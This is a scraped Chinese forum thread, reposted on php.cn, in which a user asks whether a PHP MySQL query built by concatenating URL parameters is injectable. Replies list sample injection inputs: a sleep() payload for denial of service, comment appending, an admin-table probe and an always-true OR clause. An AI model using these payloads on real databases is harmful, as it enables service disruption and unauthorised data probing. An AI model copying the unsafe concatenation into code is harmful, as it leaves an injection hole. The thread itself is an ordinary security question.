table( "ad" )." where language_id=".$s[0]." and category='".$s[1]."' and"/> table( "ad" )." where language_id=".$s[0]." and category='".$s[1]."' and">
Heim > Backend-Entwicklung > PHP-Tutorial > mysql 语句注入请问

mysql 语句注入请问

WBOY
Freigeben: 2016-06-13 12:51:08
Original
874 Leute haben es durchsucht

mysql 语句注入请教
$sql = "select * from ".$site->table( "ad" )." where language_id=".$s[0]." and category='".$s[1]."' and type=0 and state=0 order by sort_order desc";
mysql_query($sql);
$s是通过url传入的参数,我想请教下$s[0]填入什么值会造成注入漏洞还是说这个语句是无法注入的呢?

mysql 数据库注入 数据库安全
------解决方案--------------------
填什么都有可能
但我实在想不出会造成什么危害
------解决方案--------------------
$s[0] = '=1 and sleep(1000000) '

多次执行可能导致系统产生很多sleep进程,进而导致服务器的拒绝服务。。。

等大牛 帮顶。

------解决方案--------------------
推荐使用框架吧,自己写的程序难免会有考虑不周的地方,框架就不同了,把一些方法都自动封装好了,例如:防sql注入。
------解决方案--------------------
$s[0] = $s[0]." -- ";//加注释采集更多信息
$s[0] = $s[0]." and 0(select count(*) from admin)";
就知道你有没有admin这张表,等等
------解决方案--------------------
where language_id="" or ""="" and
Verwandte Etiketten:
Quelle:php.cn
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage